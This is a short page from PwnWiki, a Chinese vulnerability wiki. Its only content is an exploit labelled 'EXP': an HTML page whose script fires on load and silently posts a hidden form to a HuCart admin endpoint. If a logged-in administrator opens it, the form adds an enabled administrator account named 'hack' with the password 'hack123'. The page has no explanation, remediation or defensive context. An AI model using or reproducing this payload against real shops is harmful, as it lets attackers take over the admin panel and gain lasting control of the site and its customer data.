免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
EXP
<html><body> <script type="text/javascript"> function post(url,fields) { var p = document.createElement("form"); p.action = url; p.innerHTML = fields; p.target = "_self"; p.method = "post"; document.body.appendChild(p); p.submit(); } function csrf_hack() { var fields; fields += "<input type='hidden' name='adm_user' value='hack' />"; fields += "<input type='hidden' name='adm_email' value='email protected' />"; fields += "<input type='hidden' name='adm_mobile' value='13888888888' />"; fields += "<input type='hidden' name='adm_pwd' value='hack123' />"; fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />"; fields += "<input type='hidden' name='adm_enabled' value='1' />"; fields += "<input type='hidden' name='act_type' value='add' />"; fields += "<input type='hidden' name='adm_id' value='' />"; var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add"; post(url,fields); } window.onload = function() { csrf_hack();} </script> </body></html>
PWNWIK.COM==免费、自由、人人可编辑的漏洞库